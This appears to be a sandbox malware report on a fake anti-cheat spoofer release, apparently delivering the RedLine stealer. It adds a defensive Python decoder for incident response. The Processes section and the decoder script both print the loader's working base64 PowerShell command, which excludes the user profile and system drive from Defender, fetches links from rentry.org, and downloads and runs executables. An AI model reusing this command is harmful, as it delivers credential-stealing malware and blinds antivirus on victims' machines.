Analysis Overview
Threat Level: Known bad
The file https://github.com/SpooKie001/EasyAntiCheatSpoofer/releases/tag/v2.0 was found to be: Known bad.
Malicious Activity Summary
RedLine
RedLine payload
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
Opens file in notepad (likely ransom note)
Modifies registry class
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Checks processor information in registry
NTFS ADS
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-05 12:01
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-05 12:01
Reported
2024-07-05 12:03
Platform
win10v2004-20240704-en
Max time kernel
92s
Max time network
93s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\Loader\Loader\Loader\Loader.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\Loader\Loader\Loader\Loader.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Loader\Loader\Loader\Loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1o35kcks.mos0.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Loader\Loader\Loader\Loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\by5vay5m.g2w0.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\Loader.rar:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1o35kcks.mos0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1o35kcks.mos0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1o35kcks.mos0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1o35kcks.mos0.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\by5vay5m.g2w0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\by5vay5m.g2w0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\by5vay5m.g2w0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\by5vay5m.g2w0.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://github.com/SpooKie001/EasyAntiCheatSpoofer/releases/tag/v2.0"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://github.com/SpooKie001/EasyAntiCheatSpoofer/releases/tag/v2.0
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5012.0.527084949\1613734575" -parentBuildID 20230214051806 -prefsHandle 1768 -prefMapHandle 1760 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e4f84c0e-7480-4613-ba3d-cef26519126c} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 1856 234e012cb58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5012.1.1920008057\1169986474" -parentBuildID 20230214051806 -prefsHandle 2436 -prefMapHandle 2432 -prefsLen 22927 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e94f028e-cdc4-423e-9b32-3677db383c20} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 2460 234d3389258 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5012.2.415473037\139470982" -childID 1 -isForBrowser -prefsHandle 3080 -prefMapHandle 3096 -prefsLen 22965 -prefMapSize 235121 -jsInitHandle 1248 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e9eb706-ee3d-43bf-950e-9f36d5a646c2} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 3036 234e311ff58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5012.3.2095714897\937639227" -childID 2 -isForBrowser -prefsHandle 4084 -prefMapHandle 4080 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1248 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {23ce2ee5-1004-49a1-b39e-ea24b9a06fe8} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 4100 234e4cbdb58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5012.4.756333170\2126709632" -childID 3 -isForBrowser -prefsHandle 5308 -prefMapHandle 5232 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1248 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {866ab400-8821-451b-b372-b15f47e37e1d} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 5144 234e6ceb658 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5012.5.1702434776\245979945" -childID 4 -isForBrowser -prefsHandle 5132 -prefMapHandle 5208 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1248 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee871d58-a898-48a9-a16b-1a4a794f8c69} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 5404 234e6cebc58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5012.6.1196295877\601383613" -childID 5 -isForBrowser -prefsHandle 5592 -prefMapHandle 5224 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1248 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c13dc281-d9be-4a8e-ba44-2376bd133ae4} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 5580 234e7153c58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5012.7.300899981\157606403" -childID 6 -isForBrowser -prefsHandle 4232 -prefMapHandle 3904 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1248 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {73115db5-ef6c-403c-a1bb-ea5a182abfdc} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 4340 234d3341458 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5012.8.1686905581\442434155" -childID 7 -isForBrowser -prefsHandle 2776 -prefMapHandle 1504 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1248 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {14a4a379-4515-4014-a012-8c71e50f64f2} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 6012 234e691ab58 tab
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Loader\" -spe -an -ai#7zMap25888:74:7zEvent30972
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Loader\password.txt
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Loader\Loader\" -spe -an -ai#7zMap1939:88:7zEvent7223
C:\Users\Admin\Downloads\Loader\Loader\Loader\Loader.exe
"C:\Users\Admin\Downloads\Loader\Loader\Loader\Loader.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAagBzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQBpAGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABmAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBmAGcAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGQAZQB2ADUAMQA1ADEAMgA1ADEAMgAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAYgByAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwByAG4AegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBnAGoAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAawBlAHEAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZgB5AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAcgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB3AHkAeAAjAD4A"
C:\Users\Admin\AppData\Local\Temp\1o35kcks.mos0.exe
"C:\Users\Admin\AppData\Local\Temp\1o35kcks.mos0.exe"
C:\Users\Admin\Downloads\Loader\Loader\Loader\Loader.exe
"C:\Users\Admin\Downloads\Loader\Loader\Loader\Loader.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "…"
C:\Users\Admin\AppData\Local\Temp\by5vay5m.g2w0.exe
"C:\Users\Admin\AppData\Local\Temp\by5vay5m.g2w0.exe"
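The `-EncodedCommand` argument above is the whole second stage of this loader, and it is worth decoding rather than trusting the signature names alone. PowerShell's `-EncodedCommand` is base64 over the script text in UTF-16LE; decoding the string copied from the process list shows a one-liner that adds a Defender exclusion for the entire user profile and system drive (`Add-MpPreference -ExclusionPath`), fetches a list of download links from `https://rentry.org/dev51512512/raw`, saves each link to `%TEMP%` under a random 8.3 name plus its index plus `.exe`, and runs every file it saved. The random-looking filler such as `<#tjs#>` and `<#uie#>` between the arguments is PowerShell block comments, inserted to break naive string matching. The script below is an added example written for this report, not sandbox output and not the loader's own code: it decodes the command, strips the comment filler, extracts the URLs and behaviour flags a responder needs, and checks the two dropped executables from the Files section against the naming scheme the script implies. The drop-name regex is an inference from the decoded script (`[IO.Path]::GetRandomFileName()` yields an 8.3 name), not something the report states.

```python
"""Decode and triage the PowerShell -EncodedCommand launched by Loader.exe.

Added example for this report (not sandbox output or the loader's own code).
PowerShell's -EncodedCommand is base64 over the UTF-16LE script text, so the
same two-step decode works for any sample that uses this flag.
"""
import base64
import re

# Copied verbatim from the powershell.exe command line in the Processes section above.
ENCODED_COMMAND = "PAAjAHQAagBzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQBpAGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABmAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBmAGcAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGQAZQB2ADUAMQA1ADEAMgA1ADEAMgAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAYgByAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwByAG4AegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBnAGoAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAawBlAHEAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZgB5AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAcgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB3AHkAeAAjAD4A"

# Drop-name pattern inferred from the decoded script (an assumption, not stated by
# the report): [IO.Path]::GetRandomFileName() gives an 8.3 name such as
# "1o35kcks.mos", then the loop appends the link index and ".exe".
DROP_NAME_RE = re.compile(r"^[a-z0-9]{8}\.[a-z0-9]{3}\d+\.exe$")


def decode_encoded_command(b64: str) -> str:
    """Reverse what powershell.exe -EncodedCommand does: base64 -> UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")


def strip_block_comments(script: str) -> str:
    """Drop <# ... #> block comments and collapse the spacing they leave behind.

    In this sample the comments are random three-letter tokens (<#tjs#>, <#uie#>,
    ...) placed between arguments purely to defeat naive string matching.
    """
    no_comments = re.sub(r"<#.*?#>", "", script, flags=re.S)
    return re.sub(r"[ \t]+", " ", no_comments).strip()


def extract_urls(script: str) -> list:
    """Return every http(s) URL literal in the script, in order of appearance."""
    return re.findall(r"https?://[^\s'\"()]+", script)


def triage(b64: str) -> dict:
    """Decode the command and flag the behaviours a responder cares about."""
    script = strip_block_comments(decode_encoded_command(b64))
    return {
        "script": script,
        "urls": extract_urls(script),
        # Defender exclusion covering the whole user profile and system drive
        "adds_defender_exclusion": "Add-MpPreference" in script and "-ExclusionPath" in script,
        # second-stage link list fetched as text, then each link downloaded
        "fetches_link_list": ".DownloadString(" in script,
        "downloads_payloads": ".DownloadFile(" in script,
        "drops_to_temp": "$env:Temp" in script,
        "executes_payloads": "Start-Process" in script,
    }


def matches_drop_pattern(filename: str) -> bool:
    """True if a file name fits the random-8.3-name + index + .exe scheme."""
    return DROP_NAME_RE.match(filename) is not None


if __name__ == "__main__":
    result = triage(ENCODED_COMMAND)
    print(result["script"])
    print()
    for key, value in result.items():
        if key != "script":
            print(f"{key}: {value}")
    # Dropped files listed in the Files section of this report
    for name in ("1o35kcks.mos0.exe", "by5vay5m.g2w0.exe", "Loader.exe"):
        verdict = "matches" if matches_drop_pattern(name) else "does not match"
        print(f"{name}: {verdict} drop-name pattern")
```

The decoded script explains several rows elsewhere in this report: the `rentry.org` and `bitbucket.org` connections in the Network section (link list, then payload hosting), the two `%TEMP%` executables in the Files section, and the "Legitimate hosting services abused" signature. The Defender exclusion is the part to check first on a real host, since `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` listing the user profile or `C:\` is a durable artifact that survives the loader's own cleanup and blinds Defender to everything that follows.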
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:62974 | | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 34.117.188.166:443 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | tcp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 34.160.144.191:443 | prod.content-signature-chains.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 52.33.222.107:443 | shavar.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 34.107.243.93:443 | push.services.mozilla.com | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | 107.222.33.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.109.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | 22.114.82.140.in-addr.arpa | udp |
| N/A | 127.0.0.1:62980 | | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | rentry.org | udp |
| FR | 164.132.58.105:443 | rentry.org | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | 105.58.132.164.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| FR | 164.132.58.105:443 | rentry.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
